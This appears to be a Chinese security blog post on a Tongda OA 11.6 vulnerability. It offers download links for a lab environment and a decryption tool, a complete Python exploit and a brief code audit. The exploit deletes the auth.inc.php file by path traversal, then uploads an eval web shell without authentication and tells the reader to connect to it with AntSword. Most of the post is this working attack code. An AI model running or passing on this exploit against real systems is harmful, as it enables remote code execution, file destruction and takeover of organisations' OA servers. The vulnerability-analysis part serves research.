环境安装
11.6OA
链接:https://pan.baidu.com/s/1tmqpaq5NnY3edshJExxqQg
提取码:z33a
源码解密工具
链接:https://pan.baidu.com/s/1LbdVhaVInbMxQoAM4g4VKg
提取码:nrtw
?
?
?漏洞利用
import requests
target="http://192.168.202.151"
payload="<?php @eval($_REQUEST[777])?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[-]Failed to deleted auth.inc.php")
exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('yjh.php', payload)}
#files = {'FILE1': payload}
requests.post(url=url,files=files)
url=target+"/_yjh.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[+]Filed Uploaded Successfully")
print("[+]URL:",url)
else:
print("[-]Failed to upload file")
?运行exp,蚁剑连接_yjh.php
?
漏洞分析+代码审计
通达OA的源码是加密的,使用seayDzend进行解密。
?
1.通过可控变量guid控制目标文件路径,使函数unlink删除auth.inc.php文件。
2.upload.php上传所需的认证是通过包含auth.inc.php的,include_once是一次包含报错后继续执行程序,所以此时上传就无需认证直接上传文件。
3.action==upload进入if语句,85行为文件名,88行进行对文件名进行拼接,可控$repkid控制存放目录。91行为最终存放目录。因为/data_center/attachment没有执行权限所以先进行目录的跳转。
4.nginx配置文件中控制了attachment目录的执行权限。
?